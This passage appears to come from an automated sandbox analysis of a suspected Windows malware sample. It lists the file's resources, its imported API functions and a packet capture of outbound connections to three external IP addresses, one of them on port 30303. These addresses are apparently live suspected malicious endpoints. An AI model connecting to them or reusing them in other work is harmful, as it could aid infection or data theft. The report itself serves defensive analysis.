RT_ICON	0x292830	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0
RT_ICON	0x2930d8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0
RT_ICON	0x293640	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0
RT_ICON	0x295be8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0
RT_ICON	0x296c90	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0
RT_ICON	0x297618	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0
RT_ICON	0x297ae8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0
RT_ICON	0x298990	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0
RT_ICON	0x299238	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0
RT_ICON	0x299900	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0
RT_ICON	0x299e68	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0
RT_ICON	0x29c410	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0
RT_ICON	0x29d4b8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0
RT_ICON	0x29d988	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0
RT_ICON	0x29e830	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0
RT_ICON	0x29f0d8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0
RT_ICON	0x29f640	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0
RT_ICON	0x2a1be8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0
RT_ICON	0x2a2c90	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0
RT_ICON	0x2a3618	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0
RT_STRING	0x2a3d20	0x664	data
RT_STRING	0x2a4388	0x59e	data
RT_STRING	0x2a4928	0x29a	data
RT_STRING	0x2a4bc8	0x248	data
RT_STRING	0x2a4e10	0x582	data
RT_GROUP_ICON	0x2a3a80	0x68	data
RT_GROUP_ICON	0x291938	0x4c	data
RT_GROUP_ICON	0x29d920	0x68	data
RT_GROUP_ICON	0x297a80	0x68	data
RT_VERSION	0x2a3ae8	0x238	data

Imports

DLL	Import
KERNEL32.dll	GetModuleHandleW, IsBadReadPtr, GetConsoleAliasesLengthA, WaitForMultipleObjectsEx, GetPrivateProfileIntA, FreeConsole, GetVersionExW, WritePrivateProfileStructW, MulDiv, GetModuleFileNameW, CreateActCtxA, WritePrivateProfileStringW, ReplaceFileA, GetStringTypeExA, GetStdHandle, GetLogicalDriveStringsA, OpenMutexW, GetLastError, ReadConsoleOutputCharacterA, GetProcAddress, AttachConsole, SleepEx, VirtualAlloc, _hwrite, LoadLibraryA, InterlockedExchangeAdd, LocalAlloc, GetFileType, CreateFileMappingW, FindFirstVolumeMountPointW, GetNumberFormatW, CreateEventW, GetModuleFileNameA, lstrcmpiW, GetModuleHandleA, CreateMutexA, GetFileAttributesExW, GetConsoleCursorInfo, ScrollConsoleScreenBufferA, GetCurrentThreadId, FindAtomW, EnumResourceLanguagesW, DebugBreak, FindNextVolumeA, AddConsoleAliasW, CancelWaitableTimer, GetCommState, WaitForSingleObject, GetLongPathNameA, GetCommandLineA, GetStartupInfoA, RaiseException, RtlUnwind, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, HeapFree, WideCharToMultiByte, SetHandleCount, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, Sleep, ExitProcess, WriteFile, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, InterlockedDecrement, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, HeapReAlloc, SetFilePointer, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, HeapSize, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, FlushFileBuffers, CreateFileA, CloseHandle
USER32.dll	CharLowerBuffA
GDI32.dll	GetCharWidthW, EnumFontsW, GetCharABCWidthsFloatW
ADVAPI32.dll	MapGenericMask

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 28, 2023 10:46:01.248292923 CEST	49679	80	192.168.2.3	23.88.46.113
May 28, 2023 10:46:04.249680996 CEST	49679	80	192.168.2.3	23.88.46.113
May 28, 2023 10:46:10.250323057 CEST	49679	80	192.168.2.3	23.88.46.113
May 28, 2023 10:46:22.357672930 CEST	49684	443	192.168.2.3	149.154.167.99
May 28, 2023 10:46:22.357745886 CEST	443	49684	149.154.167.99	192.168.2.3
May 28, 2023 10:46:22.357866049 CEST	49684	443	192.168.2.3	149.154.167.99
May 28, 2023 10:46:22.375677109 CEST	49684	443	192.168.2.3	149.154.167.99
May 28, 2023 10:46:22.375749111 CEST	443	49684	149.154.167.99	192.168.2.3
May 28, 2023 10:46:22.448298931 CEST	443	49684	149.154.167.99	192.168.2.3
May 28, 2023 10:46:22.448596954 CEST	49684	443	192.168.2.3	149.154.167.99
May 28, 2023 10:46:22.651189089 CEST	49684	443	192.168.2.3	149.154.167.99
May 28, 2023 10:46:22.651254892 CEST	443	49684	149.154.167.99	192.168.2.3
May 28, 2023 10:46:22.651915073 CEST	443	49684	149.154.167.99	192.168.2.3
May 28, 2023 10:46:22.651990891 CEST	49684	443	192.168.2.3	149.154.167.99
May 28, 2023 10:46:22.655484915 CEST	49684	443	192.168.2.3	149.154.167.99
May 28, 2023 10:46:22.691979885 CEST	443	49684	149.154.167.99	192.168.2.3
May 28, 2023 10:46:22.692039967 CEST	443	49684	149.154.167.99	192.168.2.3
May 28, 2023 10:46:22.692131042 CEST	443	49684	149.154.167.99	192.168.2.3
May 28, 2023 10:46:22.692161083 CEST	49684	443	192.168.2.3	149.154.167.99
May 28, 2023 10:46:22.692228079 CEST	443	49684	149.154.167.99	192.168.2.3
May 28, 2023 10:46:22.692233086 CEST	49684	443	192.168.2.3	149.154.167.99
May 28, 2023 10:46:22.692368984 CEST	49684	443	192.168.2.3	149.154.167.99
May 28, 2023 10:46:22.696513891 CEST	49684	443	192.168.2.3	149.154.167.99
May 28, 2023 10:46:22.696552992 CEST	443	49684	149.154.167.99	192.168.2.3
May 28, 2023 10:46:22.732084990 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:22.754019022 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:22.754215002 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:22.754666090 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:22.779701948 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.136292934 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.136447906 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.140424967 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.162672997 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.163690090 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.163734913 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.163753986 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.163773060 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.163791895 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.163810968 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.163835049 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.163839102 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.163855076 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.163887024 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.163959026 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.164143085 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.164161921 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.164221048 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.164277077 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.185832024 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.185858011 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.185884953 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.185910940 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.185925961 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.185925961 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.185940027 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.185967922 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.185973883 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.185973883 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.185991049 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.185996056 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.186033964 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.186042070 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.186069965 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.186080933 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.186083078 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.186106920 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.186131954 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.186132908 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.186157942 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.186181068 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.186181068 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.186183929 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.186204910 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.186211109 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.186229944 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.186233044 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.186249971 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.186254978 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.186275959 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.186283112 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.186296940 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.186302900 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.186316967 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.186321020 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.186345100 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.186346054 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.186362028 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.186393976 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.208338976 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.208372116 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.208400011 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.208427906 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.208458900 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.208487988 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.208498955 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.208499908 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.208499908 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.208517075 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.208542109 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.208542109 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.208542109 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.208548069 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.208579063 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.208579063 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.208595991 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.208611965 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.208628893 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.208642960 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.208658934 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.208673000 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.208695889 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.208702087 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.208728075 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.208731890 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.208749056 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.208761930 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.208779097 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.208791018 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.208810091 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.208820105 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.208838940 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.208848953 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.208868980 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.208879948 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.208895922 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.208909988 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.208925962 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.208940029 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.208959103 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.208970070 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.208988905 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.208998919 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.209016085 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.209026098 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.209045887 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.209055901 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.209070921 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.209103107 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.209108114 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.209136963 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.209156036 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.209166050 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.209180117 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.209196091 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.209213018 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.209225893 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.209252119 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.209255934 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.209273100 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.209301949 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.209306955 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.209335089 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.209352016 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.209362984 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.209382057 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.209392071 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.209408998 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.209422112 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.209436893 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.209451914 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.209467888 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.209480047 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.209500074 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.209506035 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.209526062 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.209534883 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.209552050 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.209578991 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.233290911 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.233315945 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.233350039 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.233386040 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.233408928 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.233433008 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.233457088 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.233463049 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.233463049 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.233479977 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.233499050 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.233499050 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.233505964 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.233519077 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.233530045 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.233552933 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.233576059 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.233587980 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.233601093 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.233614922 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.233625889 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.233649015 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.233654976 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.233673096 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.233680010 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.233697891 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.233705044 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.233721018 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.233725071 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.233745098 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.233750105 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.233767986 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.233768940 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.233792067 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.233802080 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.233817101 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.233822107 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.233843088 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.233846903 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.233863115 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.233867884 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.233896017 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.233906031 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.233915091 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.233931065 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.233953953 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.233958006 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.233978987 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.233978987 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.233999968 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.234004021 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.234025002 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.234029055 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.234049082 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.234054089 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.234075069 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.234077930 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.234098911 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.234102964 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.234124899 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.234127998 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.234148979 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.234153986 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.234174967 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.234179974 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.234200954 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.234205008 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.234230042 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.234239101 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.234252930 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.234263897 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.234277964 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.234286070 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.234297991 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.234303951 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.234328032 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.234333038 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.234350920 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.234354019 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.234374046 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.234379053 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.234399080 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.234400034 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.234419107 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.234425068 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.234446049 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.234451056 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.234471083 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.234476089 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.234498024 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.234500885 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.234523058 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.234525919 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.234548092 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.234570026 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.234625101 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.234658957 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.234669924 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.234684944 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.234704018 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.234708071 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.234730005 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.234745979 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.234752893 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.234788895 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.234811068 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.234834909 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.234859943 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.234867096 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.234886885 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.234896898 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.234910965 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.234925985 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.234935045 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.234944105 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.234960079 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.234963894 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.234978914 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.234985113 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.235004902 CEST	49685	30303	192.168.2.3	188.34.154.187
